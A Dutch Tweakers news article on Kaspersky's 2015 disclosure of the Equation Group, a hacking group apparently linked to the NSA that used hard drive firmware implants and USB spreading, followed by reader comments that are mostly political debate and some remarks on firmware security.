Cookies op Tweakers

Tweakers maakt gebruik van cookies, onder andere om de website te analyseren, het gebruiksgemak te vergroten en advertenties te tonen. Door gebruik te maken van deze website, of door op 'Ga verder' te klikken, geef je toestemming voor het gebruik van cookies. Wil je meer informatie over cookies en hoe ze worden gebruikt, bekijk dan ons cookiebeleid.

Meer informatie

Door , , 119 reacties

Beveiligingsbedrijf Kaspersky heeft het bestaan van een hackersgroep ontdekt die mogelijk achter tienduizenden infecties zit en die groep kan worden gelinkt aan de Amerikaanse inlichtingendienst NSA. De hackersgroep maakte gebruik van command-and-control-servers in onder meer Nederland.

Kaspersky noemt de hackersgroep, die in ieder geval sinds 2001 actief zou zijn, een van de meest geavanceerde ooit. Het Russische beveiligingsbedrijf heeft vijfhonderd infecties van de groep weten te achterhalen, maar denkt dat het daadwerkelijke aantal infecties in de tienduizenden loopt. Niet alle infecties konden worden achterhaald, omdat de malware van de groep zichzelf kan vernietigen. Vooral instellingen in Iran, Rusland en Pakistan zouden het doelwit zijn geweest, evenals Afghanistan, India en China. Daarbij werden onder meer overheden en militaire instellingen aangevallen, maar ook providers, universiteiten en onderzoeksinstellingen.

Het bedrijf heeft de hackersgroep de Equation Group gedoopt, vanwege de voorliefde van de aanvallers voor encryptie en methoden om hun sporen te wissen. Hoewel Kaspersky met geen woord rept over betrokkenheid van de Amerikaanse inlichtingendienst NSA, zijn er meerdere aanwijzingen voor verbanden tussen die twee, tekent Ars Technica aan. Zo komen sommige codenamen in de broncode van de door de groep gebruikte malware overeen met codenamen die voorkwamen in Snowden-documenten. Ook de naam van een keylogger kwam overeen.

Bovendien kwamen twee van de zero day-kwetsbaarheden die de groep gebruikte overeen met kwetsbaarheden die de NSA zou hebben gebruikt in Stuxnet, malware waarmee Iraanse nucleaire installaties werden aangevallen. Ook bepaalde technieken die de hackers gebruikten, bijvoorbeeld om hun sporen te wissen, kwamen overeen. Het is dan ook mogelijk dat de malware van de groep is gebruikt in de Stuxnet-aanval, aldus Kaspersky.

Kaspersky rept niet over infecties in Nederland, hoewel dat niet wil zeggen dat die er niet zijn geweest. Zeker is wel dat ook Europese instellingen het doelwit waren: onder meer in België, maar ook in het Verenigd Koninkrijk, Frankrijk en Zwitserland, vond Kaspersky infecties. Kaspersky vond wel minstens één command-and-control-server op Nederlandse bodem.

De groep beschikte onder meer over malware met een eigen virtueel bestandssysteem, zodat bestanden van de malware niet op het normale bestandssysteem hoeven te worden ondergebracht en dus minder makkelijk te vinden zijn door virusscanners. Die techniek zou ook zijn gebruikt bij aanvallen van de NSA op de Duitse overheid en een Britse aanval op de Belgische provider Belgacom.

Ook bracht malware van de groep bestanden onder in het register van Windows, eveneens met als doel om de sporen te wissen. Daarnaast beschikte de groep over malware die zich verspreidt via usb-sticks, om zo airgapped-computers die niet aan internet zijn geknoopt te kunnen infecteren. Hoewel Kaspersky enkel Windows-infecties aantrof, zijn er aanwijzingen dat de groep ook op iOS- en OS X-apparatuur wist binnen te dringen.

De groep zou ook in staat zijn om malware onder te brengen in firmware, bijvoorbeeld in die van de harde schijf. Daarbij wist de groep onder meer schijven van Western Digital, Seagate en Toshiba te kraken. Daardoor krijgt de malware volledige controle over de computer; zelfs herinstallatie van het besturingssysteem of het wipen van de schijf zorgt er dan niet meer voor dat de malware verdwijnt. Ook is het daardoor vrijwel onmogelijk om malware te detecteren.

Slachtoffers kregen de malware onder meer via cd's die de groep onderschepte en voorzag van malware. Het onderscheppen van pakketten om malware toe te voegen is een techniek waarvan eerder al bleek dat de Amerikaanse NSA die toepast.

Kaspersky Equation

Lees meer over

Moderatie-faq Wijzig weergave

Reacties (119)

Extra bronnen:
https://securelist.com/bl...h-star-of-malware-galaxy/
PDF document met het kaspersky rapport:
https://securelist.com/fi...questions_and_answers.pdf
De komende dagen zal het Russische anti-virusbedrijf meer details over de groep en toegepaste werkwijze publiceren. Inmiddels is er al een document online verschenen (pdf) met aanwijzingen en details zodat onderzoekers en systeembeheerders kunnen controleren of er machines binnen hun organisatie of omgeving zijn getroffen. "Hoe meer we dit soort cyberspionage-operaties onderzoeken, des te meer we begrijpen hoe weinig we ervan weten. Samen kunnen we deze praktijken onthullen en aan een veiligere (cyber-)wereld werken", aldus de onderzoekers.
https://www.security.nl/p...t+firmware+harde+schijven

[Reactie gewijzigd door ReTechNL op 17 februari 2015 08:54]

Hoewel het aannemelijk klinkt is het toch Rusland dat Amerika beschuldigd.

De manier van infecteren (de harddrive) werd op Ohm2013 door een onderzoeker gepresenteerd. Hier een research paper over het infecteren van harde schijven:
https://www.ibr.cs.tu-bs.de/users/kurmus/papers/acsac13.pdf
Vergeet onze eigen Sprite_tm niet!

http://spritesmods.com/?art=hddhack

[Reactie gewijzigd door W3ird_N3rd op 17 februari 2015 10:31]

Sprite was dan ook de persoon die die presentatie op OHM2013 hield. ;)
Ja echter volgens de bron code was dit door die groep al in gebruik in 2008.
Ongewenste reactie! Ad hominem drogreden!
Het is geen drogreden maar een constatering.
Hackers met banden tot de NSA, het moet ook niet gekker worden. Nou vind ik de NSA zelf eigenlijk ook wel een soort van hackers bende dus misschien is het zo gek toch niet :(
"Hackers met banden tot de NSA" Is erg suggestief daarom verwijst Kaspersky er ook niet naar, echter zo vreemd is het niet dat de NSA gewoon een team heeft dat dit soort zaken uitvoert. Er zullen vast meerdere teams zoals dat in de wereld zijn bij geheime diensten.

Immers Cyber Warfare is echt de volgende stap, waarom oorlog voeren als je het ook kan stelen ;)
'ghost teams' 'of record personeel' 'covert ops' 'sleeper cel'

4 termen die redelijk bekend zijn voor de gemiddelde persoon met een halve hersencel en een goede internet verbinding..

ik zou er bijna zeker van kunnen zijn dat ALS ze banden hebben met de NSA.. dan zijn ze vast een de boven genoemde dingen..

oh de NSA staat onder media aandacht? dan schuiven we onze cyber crime toch gewoon onder de grond?

oh de NSA word onderzocht door de FBI na Snoden onthullingen.. hoppa schuif af die spullen en kom maar weer terug als 't rustig is...

zo gaat dit soort dingen 9/10x gewoon.. 'you don't have anything.. you can't proof anything' good day sir - NSA
Wat het laat zien is het falen van de democratie Amerika. Nu wisten we dat al lang maar dit is het zoveelste kleine voorbeeld daarvan.

Datzelfde land predikt dan democratie voor andere landen maar schijnt niet te begrijpen dat een heleboel mensen dat schijnheilig noemen.

Dat de NSA een gesponsord hackergroepje heeft lijkt eigenlijk gewoon op de amerikaanse private ondernemingen zogenaamde beveiliging ondernemingen die in veel landen bezig met vage praktijken en structureel het hand boven het hoofd wordt gehouden.

Het is niet langer meer de vraag hoe rot het hele systeem daar is maar wat het rotste voorbeeld is.
Tja.... natuurlijk kun je alles afschuiven op de USA. Ehm China, Noord Korea zijn natuurlijk geweldige landen deze hebben natuurlijk ook van dit soort teams en zijn hier net zo schuldig aan dat weet je zelf ook wel.
Dat zal best. Maar amerika is voor ons gevaarlijker omdat juist amerika , als westers land, ons in de zak heeft. Dat hebben ze cultureel, economisch, politiek en militair via de NAVO.

Wij identificeren ons met hen, niet met de andere landen die je noemt. Olie wordt in dollars verhandeld, het is de belangrijkste valuta op Aarde. Dat maakt het verschil. Daarom ondermijnt juist amerika onze waarden en normen. Zo werken onze geheime diensten nauw samen met amerika, niet met China etc.

Dat maakt ons hypocriet omdat wij onder leiding van amerika en via culturele, politieke, economische sturing vanuit dat land onszelf compromitteren. Wij gaan mee in wat zij willen. Dat betekent dat wij grote kritiek hebben op China over mensenrechten maar zeer welbespraakt mild kritisch zijn over mensenrechtenschendingen in de good 'ole usa.

Wij kiezen een kant. Wij zijn niet zo onafhankelijk als we denken. En we doen dat omdat we drommels goed weten dat het laagje chroom over de vriendschap met zo'n land, met zo'n leger, zo'n invloed en universele slagkracht in termen van cultuur, politiek, militair etc., al gauw verdampt als we ons onbehoorlijk gaan gedragen.

Amerika heeft geen vrienden, zelfs geen 'allies'. Ze hebben concurrentie en potentiŽle vijanden. Het is Romerica. En wij zijn een vazalstaat die, net als de Britten ten tijde van het Romeinse Rijk, de cultuur overnamen door ook in Romeinse stijl te bouwen en ons net zo te kleden. Onderwijl steelt amerika waar ze maar kunnen, al dan niet via hun geheime diensten, bedrijfsgeheimen (Eschelon), zo te zien infiltreren ze universiteiten, om kennis te vergaren die zij kunnen gebruiken om hun militaire apparaat te versterken, dan wel hun internationale economische positie op gebied van kennis en daarmee hun imago te versterken.

Wij maken als land de keuze om ons daarbij te scharen. We kleden ons amerikaans, we kijken naar amerikaanse films en tv. We denken steeds amerikaanser. We handelen met hen en hebben elkaar zo bij de ballen en zorgen er zorgvuldig voor dat geen van beide begint te knijpen.

Dat we hiermee voor een groot deel onze eigenheid opgeven, ten gunste van de lokaal exploiterende MacDonalds ondernemer, die verantwoordelijkheid aflegt aan de amerikaanse tak, laat slechts zien hoe, als je ageert tegen amerika door een MacDonalds niet te bezoeken, je in feite je eigen economie ondermijnt. Want die ondernemers van die franchises investeren lokaal.

China, India, ze hebben invloed, vooral omdat wij goedkope kleding eisen, goedkope gadgets en andere elctro-troep. We buiten hun vooral uit, want dat Kruidvat t-shirt dat ik vanmorgen op tv zag, voor damnes, van §5,- komt natuurlijk uit zo'n land.

De prijsopbouw is natuurlijk §0,02 cent per t-shirt voor de Indiase 12-jarige naaister + overlijdensrisico van instorten/brand van de sweatshop, uitbuiting en slechte leefomstandigheden, transport §0,20 cent, rest van de bedrijfskolom §3,- en winst voor de Kruidvat wat er overblijft.

Amerikaanse werknemers zijn beter af. Daar eindigt zo'n beetje de invloed van Oosterse landen. Onze kleding en goedkope electronica.

Het beste wat China en India kunnen doen om ons te naaien, is de kledingproductie stopzetten. Dan hebben we nog een paar jaar en dan zijn we allemaal naakt.
sorry maar dit heeft toch helemaal nul komma nul toegevoegdewaarde betreffende het artikel. Ik weet het, je reageerd ergens op maar het lijkt meer op een emotionele reactie vanuit jouw perspectief .

maar je punt het is duidelijk, je hebt het niet zo op de US of A

En toch nog +2 krijgen

[Reactie gewijzigd door Garret1410 op 17 februari 2015 21:59]

Vaak is iemands mening een emotionele reactie als je het er niet mee eens bent. Vreemd hoe dat werkt. Toen ik 16 was had ik al discussie met vrienden over amerika.

Dat heeft een reden: amerika staat altijd in het centrum van de belangstelling. iemand laat ergens een scheet en de NOS komt met de vraag: 'Wat zeggen de amerikanen er van?'

Als je je zo positioneert als wereldleider, dan vang je de aandacht. En met aandacht komt onderzoek en kritiek. Mijn mening is gebaseerd op argumenten, die ik misschien niet zo expliciet weergaf. Maar als je dat doet, dan is het te vaak off-topic. Daar houden mensen niet van en wordt je weggemod, omdat de meesten alles keurig in nette vakjes willen houden.

NSA en hacking gaat uiteindelijk over moraliteit en cultuur en machtsverhoudingen en hoe wij als mensen elkaar niet vertrouwen. Dat zie ik niet los van het feit dat een hackersclub nauw zou samenwerken met de overheid. Dit heeft verstrekkende implicaties. Die kun je proberen er buiten te laten, maar dan negeer je de kern van het probleem.

Amerika bekritiseren stuit sommigen tegen de borst op dezelfde manier als sommigen die menen dat er geen islamisering bestaat.

"It is hard to fight an enemy who has outposts in your head."
-- Sally Kempton
Het beste wat China en India kunnen doen om ons te naaien, is de kledingproductie stopzetten. Dan hebben we nog een paar jaar en dan zijn we allemaal naakt.
:D :D :D

ik krijg een nieuw toestenbord van je :P zit nu vol met cup-a-soup vermecelli
En zo zie je maar dat er vreemde koppelingen bestaan, zoals tussen jouw naam, kledingproductie, hoe je mensen 'naaien' kunt en, vreemd genoeg, vermicelli, hoewel een Italiaans woord, denk ik, een vorm van Chinese noodles in zekere zin en zelfs je soep-etende toetsenbord, mogelijk 'made in China'.

De wereld is echt vreemder dan we denken.

:o
Ehm wat een flauwe kul. Jij weet r echt niet wat China bezit gigantische monopolie op heel veel grondstoffen, alle elektronica komt voornamelijk uit? China. Zonnen panelen dumping is 1 van de vormen hoe ze Europese bedrijven kapot maken door met subsidie onder te prijs te gaan zitten. Chinese bedrijven kopiŽren alles . Van auto's tot electronica. China is al lang niet meer interessant voor kleding , je ziet trends dat die juist weg trekken naar goedkopere landen. Amerika is alleen maar gevaarlijk als je daar woont.
De monopolie is eigenlijk een urban legend.
China is een van de weinige landen die brood ziet in het delven van de stoffen. Maar de stoffen an-sich zijn niet zeldzaam en zijn ook terug te vinden op andere plaatsen.

Mocht het zo zijn dat China gaat spelen met de prijs dan pakken ze alleen zichzelf, het gros van de productie is niet voor binnenland bedoeld. Dan komen andere landen om de hoek kijken.
Met dumping maak je alleen jezelf kapot. Als jij mooie zonnepanelen gratis weggeeft, dan kun je het wel 'dumping' noemen, maar van dingen onder de kostprijs weggeven is nog nooit iemand rijk geworden.
Amerika is alleen maar gevaarlijk als je er woont?
Blackops aktief in 105 landen met als ambitie alle landen.
http://www.zerohedge.com/...deployed-105-nations-year
Als die empire valt, is het vergelijkbaar met het romeinse rijk. Het is goed als het valt, maar dan is er al heel wat schade aangericht. Brandhaarden overal, wrok, vernietigd opleidingssysteem, waar onderdanen in zijn opgeleid ipv zelfstandig denkende mensen. Goed om belasting te betalen om het systeem in stand te houden.
Ah, maar ik kan heel goed ademhalen en aardappels eten zonder GSM hoor. Die zeldzame grondstoffen heb ik niet nodig.

En ze kopieren alles. Vaak...tja...amerikaanse tech...toch? :-)
Wat ik zie is een land dat in de eerste plaats aan zijn eigen belangen denkt en daar ook vrij openlijk voor uitkomt. Dat vind je trouwens ook terug bij de meeste andere economische en/of militaire grootmachten zoals China, Rusland, BraziliŽ, India etc... gaat. Ik kan ze alleen maar gelijk geven. Misschien dat we dat in Europa beter ook wat meer zouden doen. Wij lezen graag anderen de les en wijzen voortdurend met het vingertje, doen ons heiliger voor dan de paus, spelen graag (?) het toevluchtsoord voor alle miserie uit de wereld, maar krijgen intussen ons eigen huishouden nog niet op orde (of het nu gaat om Europese chaos, migratie, extremisme, torenhoge schuldenlasten en belastingen en ik kan nog een tijdje doorgaan) en spelen op wereldniveau nog nauwelijks een rol van betekenis. Neen, geef me dan maar een land dat in de eerste plaats voor zichzelf zorgt. Ik doe daar niet hypocriet over.
Denk jij dat het dan gewoon de frictie is tussen globaliteit en lokaliteit?
Mag ik je complimenteren met deze zienswijze? Ik denk er namelijk nťt zo over. Maar we worden door de media, de overheid (als marionetten van de Yanks) en alles om ons heen dusdanig geÔndoctrineerd, dat "de kudde" het niet eens doorheeft. De geschiedenis herhaalt zich...
Dank je wel. Ach weet je, de geschiedenis is een fractal.

Hoe meer je in- of uitzoomt, hoe meer je dezelfde patronen ziet. Hoe wij als mensen zijn uit zich in kleine en grote dingen. Patronen, parallellen, verbanden. Mensen in Oost OekraÔne zijn overtuigd van hun identiteit, hun cultureel verband met de Russische cultuur en zijn bereid er voor te vechten, te sterven. Maar toen ze werkloos waren kwam hun uitkering gewoon uit Kiev... en werd opgebracht door het rijkere westelijke deel. En Rusland manipuleert op ongekende wijze de sentimenten.

Dat doen wij ook maar noemen het een NAVO-missie. (Via het embleem van de UN, vaak.)

De Groningers identificeren zich rond hun cultuur en dialect en komen in opstand tegen de aardgaswinning. En terecht. Oost-Groningen kreeg (of krijgt) subsidie uit Europa omdat de regio leegloopt. En dat met die aardgasbaten...

Alles schaalt op en neer. De Mandelbrot-cultuur.
Ik geloof niet dat China of Noord-Korea Irak zijn binnengevallen om dat tot een democratie te bombarderen. Die landen hebben ongetwijfeld geen schone handen maar als er een land is wat vrede preekt maar oorlog voert dan is het Amerika wel.
Ik denk ook dat bbob1970 onder andere refereert naar het personeel van Blackwater wat als private onderneming oorlogen uitvecht en waarbij nogal wat misdaden werden opgemerkt. Het is dan ook niet onwaarschijnlijk dat de NSA een soort expandable hackersgroep in dienst heeft die de rotte klusjes uit mogen voeren.
Dat klopt maar ze hacken alles , stelen alles. En bezitten dadelijk ook alles. Concurreren Europese bedrijven kapot. Denk aan recente zonnepanelen dumpen.
En dat is wat we willen. Zonder dat soort ongeinige kapitalistische concurrentie, was een GSM §12,000 euro?

Welkom op Aarde.

Als aliens bij de Aarde arriveren en ons bestuderen zouden ze zeggen: 'Wat the fuck are these people doing?!!? THIS is how your organize yourself?!?'

Edit: Maar dan in Standaard Alien, natuurlijk, niet Engels. Zegt iets over mijn amerikaanse speelfil-bias...

[Reactie gewijzigd door Vendar op 17 februari 2015 13:04]

Wat het laat zien is het falen van de democratie Amerika. Nu wisten we dat al lang maar dit is het zoveelste kleine voorbeeld daarvan.
Datzelfde land predikt dan democratie voor andere landen maar schijnt niet te begrijpen dat een heleboel mensen dat schijnheilig noemen.
Het is dan ook een opgelegde democratie the American wayy, die ze prediken en willen brengen.

Als we ongefundeerd en onbewezen iets opperen of bedenken is het smaad, maar telkens weer blijkt er een kern van waarheid in te zitten. Droevig.
Conclusie in de kortst mogelijke bewoordingen: NSA=pure evil &
GCHQ = pure evil
(En dit terwijl USA en UK zelf wel op diverse gebieden zijn te kwalificeren als great country)

[Reactie gewijzigd door BeosBeing op 20 februari 2015 18:20]

De NSA ZELF besteedt altijd al bijna alles uit.
Zo werkte Snowden ook niet voor de NSA zelf, maar voor een bedrijf dat ingehuurd wordt door de NSA om bepaalde opdrachten uit te voeren.
Ja dat is een verhaaltje dat natuurlijk van geen meter klopt.

Hij zal bedoelen CIA in dat geval.
'ghost teams' 'of record personeel' 'covert ops' 'sleeper cel'
4 termen die redelijk bekend zijn voor de gemiddelde persoon met een halve hersencel en een goede internet verbinding..
Bedankt voor het compliment ;)
precies. Dingen die je zelf niet mag doen vanwege regelgeving kun je altijd nog uitbesteden.
Dan kun je zonder te liegen zeggen dat je [actie X] niet gedaan hebt.
Maar ontvangen uit een geheime betrouwbare bron.
precies. Dingen die je zelf niet mag doen vanwege regelgeving kun je altijd nog uitbesteden.
Dan kun je zonder te liegen zeggen dat je ~[actie X] niet gedaan hebt.
Een alibi dus. Zo oud als de weg naar Rome. (wellicht zelfs ouder)
Het is niet gek, wie oh wie zou bij NSA willen werken? Niet alle hackers zijn opgepakt of hebben een strafblad. Als hacker is de NSA dan een goudmijn aan data.

Niet alle hackers hebben kwade bedoelingen, sommige waarschuwen, sommige stelen, sommige leaken data omdat het instantie corrupt is of kwade bedoelingen hebben of juist blackmail. Dus goed of slecht? geen idee het wordt nog steeds beheerd door mensen die eventueel onze data kan misbruiken.

Ik hoor vaak deze term 'Mij maakt het niks uit, ik heb toch niks te verbergen', met deze statement kan je net zo goed je wachtwoord naar iedereen geven, ook al was de NSA een goede instantie(is het niet) je kan niet zeker weten of de werknemers ook valide goed hartig zou zijn. Niet alleen da,t als je NSA het op kan pikken, wie allemaal kan dat nog meer?

[Reactie gewijzigd door ilaurensnl op 17 februari 2015 09:27]

"Mij maakt het niks uit, ik heb toch niks te verbergen" is dan ook de grootste kul ooit. Er zijn genoeg landen (geweest) waar het je niet goed zal vergaan als je atheÔst, homo, communist, blank, christelijk, of noem maar een willekeurige eigenschap bent. En wellicht zullen We niet christenen of blanken gaan vervolgen, maar een overdosis aan westerse landen hebben wel een geschiedenis van "preventief arresteren", mishandelen of zelfs doden van demografiŽn, en aangezien de integriteit van geen enkel land kan worden gegarandeerd kan dat prima opnieuw gebeuren. Ik zie het westen wel ervoor aan om een jacht op moslims, joden en misschien ook wel intellectuelen en sommige politieke stromingen te ontketenen. Misschien vervolgen we ook nog mensen met een medisch probleem, om de verzekeringen blij te maken. Hoeven die ook minder risicogroepen te dekken. Je zou maar eens tot zo'n doelgroep horen, en je data op straat hebben liggen.

Is de kans dat zoiets gebeurt groot? Waarschijnlijk niet. Maar waarom mensen het risico willen lopen is mij een raadsel.
Ik hoorde van mijn Schotse vriend dat de Tories in Engeland neem ik aan, maar misschien zitten die ook wel in Schotland, dat weet ik niet, het plan lanceerden om mensen die te dik zijn om nog te kunnen werken te verplichten tot behandeling.

Veel mensen hier zullen zeggen 'Ja dat snap ik wel, jij je vol eten en dan geld vangen van de overheid waar ik belasting betaal en acht uur moet werken per dag.'

Die mensen geef ik ter overweging aan dat eten je een korte 'rush' geeft. Mensen die letterlijk zo vele ten hebben een zwaar psychisch probleem en gebruiken eten als medicatie. Dat betekent dus dat je mensen met psychische problemen (soms ook lichamelijke problemen die leiden tot overgewicht) gaat verplichten tot behandeling. En als je een mens met een psychisch probleem verplicht behandeld, waarom dan niet ook een schizofreen? Of iemand met autisme? Of ADHD? Of een bipolaire stoornis, een borderliner, iemand met chronische depressie?

Maar gedwongen behandeling is hetzelfde als wat Alan Turing moest ondergaan, chemische castratie, waardoor hij uiteindelijk stierf door zelfmoord.

En Alan Turing vinden we allemaal een zielig verhaal, want de man was een held en een originele Tweaker-held.

Dit is misschien deels off-topic, maar ik meen hier dit te moeten aangeven vanwege jouw bericht. Het gaat over het grijze gebied van wat we moreel vinden. En dat zie je ook bij hackers.

Sommige hackers doen moreel verantwoordelijk 'werk' of hebben moreel hoogstaande intenties. Anderen doen het voor eigen gewin, uit politieke overweging. Defacing bijvoorbeeld van websites. Anderen laten zich inhuren door overheidsdiensten en vinden het eigenlijk wel leuk om rond te kloten met goedkeuring van een overheid om zo hun immorele inborst de vrije loop te laten.

Hackers zijn dus net mensen.

De echte vraag op de achtergrond is spant zich dus over de hele samenleving heen. Wat is moreel gedrag? En is er een andere definitie van wat moreel gedrag is wanneer overheden 'het doen'? We zien het dus bij hacking, bij overheden zowel als het gaat om medische zaken, economische zaken en de koppeling via marktwerking tussen beide, want een verzekering wil niet uitbetalen terwijl ze daar eigenlijk voor bedoeld zijn, we zien het bij internationale ondergrondse politiek en in nog wel meer zaken.

Hacking is onderdeel nu van onze cultuur geworden. Het is deels overheidswerk, en men noemt dat AIVD en MIVD, er zijn commerciŽle hackers, eigen gewin hackers en pure criminele hackers.

Dat is hoe ik er tegenaan kijk. Een veel dieper probleem van hoe we als mens op Aarde menen te moeten zijn, of onszelf toestaan te zijn of te worden. Dus dat er mogelijk banden zouden zijn tussen NSA en hackersgroepen, en dat die met elkaar vervlechten is niet zo vreemd.

[Reactie gewijzigd door Vendar op 17 februari 2015 11:24]

En de oplossing is zoals bij alles dat met mensen moet omgaan systemen te bouwen die bestand zijn tegen 'immorele' actoren. In de eerste plaats door de systemen zelf te verbeteren (de security bugs te fixen, op zo'n manier te programmeren, implementeren, installeren en gebruiken dat security bugs en problemen minimaal aanwezig en/of exploitable zijn).

M.a.w. ben je bang dat je ophaalbruggen en dammen in Nederland gehacked zouden worden; zet die dingen dan niet op het Internet (dit is dus een installatie issue). Wil je niet dat 1000den windmoles door een hacker omzeep geholpen worden, zet die Windmolens dan op een VPN of ander netwerk waar je zonder sterke encryptie en speciale toegang in zijn geheel niet op kan (dus opnieuw, een installatie issue).

Tot slot wil je niet dat je garagepoort kan geopend worden via de domotica van je huis, zet je verdomde huis dan niet op het Internet (tenzij via een dure, goed ondersteunde en/of geverifieerde veilige VPN software - en dan nog). Wil je vanaf het Internet je garagepoort kunnen openen, dan koop je als consument maar beter een model garagepoortdomotica dat deftig getest werd door de fabrikant om op't Internet te kunnen (het moet dus bestand zijn tegen hacker-aanvallen op alle mogelijke externe inputs).

Dat wil zeggen dat op het niveau dat managers en management van bedrijven die software maken voor "Internet Of Things"-rotzooi, die nu ontwikkeld wordt, zich er wel iets van moeten aantrekken dat de producten die ze maken veilig zijn. Dat doet 99% van de bedrijven momenteel totaal niet. Bv. dat men kan inbreken op uw SmartTV dat vindt niemand van de bedrijven die SmartTVs maken interessant. Dat door op de TV in te breken je vaak de microfoon kan afluisteren om te weten of het gezin thuis is alvorens in het huis in te breken, vinden de SmartTV bouwers ook helemaal niet zo interessant. De consument begrijpt het allemaal niet zo goed en koopt dit Internet-Of-Things stuk rotzooi dus toch.

M.a.w. zoiets als Testaankoop of een consumentenorganizatie hoort streng toezicht te houden op de beveiliging van consumenten en/of Internet-Of-Things rotzooi. De programmeurs moet verteld worden dat ze zo slecht zijn als dat ze zijn (ik ben zelf al meer dan tien jaar programmeur in embedded, trust me I know how bad it is - it's extremely bad) en dat hun software moet getest worden. Dat ze moeten ingaan op securitybugs die gevonden worden. Dat ze geen gelijk hebben dat ze het zonder fouten kunnen (dat kunnen ze, totaal, niet). En dat dit wel belangrijk is (het bedrijf dat de toestellen verkoopt zou bv. verantwoordelijk gesteld moeten kunnen worden voor de schade - net zoals de autoindustrie bij bepaalde zware fouten verantwoordelijk gesteld kan worden).

Helaas zal het echter blijven zoals het is en moeten er nog meer ernstige dingen gebeuren eer er iets zal veranderen (bv. een maar massa-kettingsbotsingen met honderden doden, met behulp van autonome wagens omdat de autoindustrie het allemaal niet zo interessant vond om veilige software in auto's te steken).
Het probleem is dat die kans er wel is. Om het in de woorden van George Carlin te zeggen "you do not have rights, you have privileges"
Het is niet gek, wie oh wie zou bij NSA willen werken? Niet alle hackers zijn opgepakt of hebben een strafblad. Als hacker is de NSA dan een goudmijn aan data.
Velen maken de denkfout dat er eerst willekeurige hackers waren die daarna bij de NSA zijn gaan werken. Als huurlingen bij de Navy Seals.
Het ligt meer voor de hand dat de NSA zijn eigen mensen heeft opgeleid en geen enkele band heeft met hackers uit de buitenwereld. Wel net zo veilig voor henzelf ook.
Hoe het ook zij, als de NSA deze acties inderdaad heeft uitgevoerd dan is het zelf, incl. zijn medewerkers een hackende organisatie.
Dat er bij de NSA's op deze planeet alleen boeven werken, dat is per definitie natuurlijk zo, want inlichtingendiensten zijn tenslotte overtreders van de eigen wet.

Maar in dit geval lijkt het er sterk op dat deze 'hackersgroep' door Kaspersky geidentificeerd meer richting Iran gezocht moet worden.

Zie pagina 25 welke landen ontzien werden in dit tooltje.

https://securelist.com/fi...questions_and_answers.pdf
Ik begrijp niet waar deze moral panic vandaan komt. Het lijkt alsof veel mensen verbaasd en geschokt zijn dat landen elkaar bespioneren. Het begluren van relevante buitenlanders is de kerntaak van een geheime dienst.

Dat het niet altijd om de interne veiligheid gaat en de NSA zich ook met economische en politieke spionage bezighoudt, ligt voor de hand. Net als de geheime diensten van alle andere landen ter wereld.

De enige mensen die een goed argument hebben tegen de acties van de NSA zijn de Amerikanen zelf.
Nouja het is eerder blackmail, of je helpt je regering of je gaat 25 jaar de bak in.
Hoeft niet. Er zijn zat hacker groeperingen die alles doen voor geld. Ze kunnen dus ook gewoon ingehuurd zijn.
Wat Kaspersky hier beschrijft is veel te ingewikkeld voor huurlingen/consultants.

Dat zijn overheden geweest. Wel vermoed ik dat het meerdere overheden betreft die mogelijkerwijze ook nog eens elkaars vijanden waren. 1 van de naties die duidelijk aan de slag lijkt gegaan met deze vormen van hacken lijkt Iran te zijn.

Zie pagina 25.

https://securelist.com/fi...questions_and_answers.pdf
Bewijs zoiets maar, maar wie zegt dat het Amerikanen zijn ;)
if you can't beat them join them :P
Misschien is het juist wel andersom... NSA met banden tot deze elite hackgroep...
Met al dit nieuws over firmware (USB, HDD, etc) wordt het toch eens tijd dat er vanuit de technische branche wordt gekeken naar checksums voor firmware.

Edit:

Ik bedoel, als je het kan infecteren dan kun je het ook controleren lijkt me!

[Reactie gewijzigd door Thystan op 17 februari 2015 14:36]

Once a hard drive was compromised, the infection was impossible to detect or remove.
Uiteraard, zo kan niemand het tegendeel aantonen. Hier gaat de geloofwaardigheid verloren als je het mij vraagt.
Hoe kan dat VFS wat ze aangelegd hebben met die evil firmware zichtbaar en bruikbaar zijn als de infectie zelf niet detecteerbaar is? Dat filesystem moet de boel correct kunnen adresseren voor lees- en schrijfacties...

Maar sowieso, om een harde schijf op afstand te kunnen benaderen moet eerst de computer waar die schijf aan hangt worden binnengedrongen aangezien schijven zelf over het algemeen geen netwerknode zijn en geen internetaansluiting hebben.
Op volgorde: netwerktoegang forceren, OS infecteren om aan permissies en hardware-informatie te komen, op low-level de firmware van de schijf overflashen en de nieuwe code daarin daadwerkelijk actief maken.
Mijn idee is dat de computer + OS waarop dit mogelijk is 1 grote achterdeur moet zijn. En dan nog lijkt het me bijna niet te doen, tenzij de hardware er actief aan meewerkt buiten het OS om.

Propaganda / angst zaaien?

edit: was @tie-rip, excusez

[Reactie gewijzigd door blorf op 17 februari 2015 18:05]

Waarom moet een kernel firmware kunnen beschrijven? Lijkt me perfect haalbaar om een GPIO of ander systeem te voorzien (een goede oude jumper) die het hardwarematig onmogelijk maakt om firmware van een device zoals een harde schijf te wijzigen tenzij die jumper gezet is (of een bepaalde USB dongle erin steekt, of of of). Of misschien een private key bij de bouwer van de firware die moet gebruikt worden om een public key bij de nieuwe blob van de firmware te vergezellen en de harddisk die enkel correcte blobs accepteert (als we het toch enkel via software willen mogelijk maken).
Kernprobleem is dat bedrijven en overheden alleen betalen om bepaalde personen te hacken; niemand betaalt genoeg om iets ook veiliger te krijgen.
Als deze firmware slim genoeg is slaat het een legitieme versie van de firmware nog ergens op zodat hij die naar de computer kan spelen op het moment dat de computer die wilt uitlezen voor bijv. zo'n check.

Hier doe je niet zo gek veel aan op bijvoorbeeld een jumper na die ervoor zorgt dat de flash chip fysiek niet meer te programmeren is.
Als het zo is, is het super interessant. Maar stel dat het echt zo is, wat gaat er veranderen? Wie krijgt er straf? Sorry voor mijn pessimisme, maar dit is weer het zoveelste nieuwsitem waar niets mee gebeurd. :(
De veiligheidsdiensten van de getroffen landen zullen een inventarisatie moeten maken van de getroffen systemen en die opruimen en maatregelen nemen om dit zoveel mogelijk te voorkomen.
Daarmee zal de effectiviteit van deze hackersgroep sterk afnemen. Nu ze ontdekt zijn zullen ze waarschijnlijk ontmanteld worden. Uiteindelijk zal dat gat wel weer gevuld gaan worden en zal de volgende stap in de cyberwapenwedloop genomen worden.
Inventariseren wat er sinds 2001 aan systemen getroffen is. :X Met malware die zich zelf opruimt? 8)7
Deze groep hoeft zich niet te ontmantelen. Het is niet bekend wie die groep is en dat kunnen ze ook niet voldoende herleiden uit de gegevens die nu bekend zijn. Waarom dan stoppen?
Het enige dat men nu weet is dat dit stuk malware bestaat. Er tegen beschermen is nog niet te doen dus ook geen reden voor de hackers om er mee te stoppen.
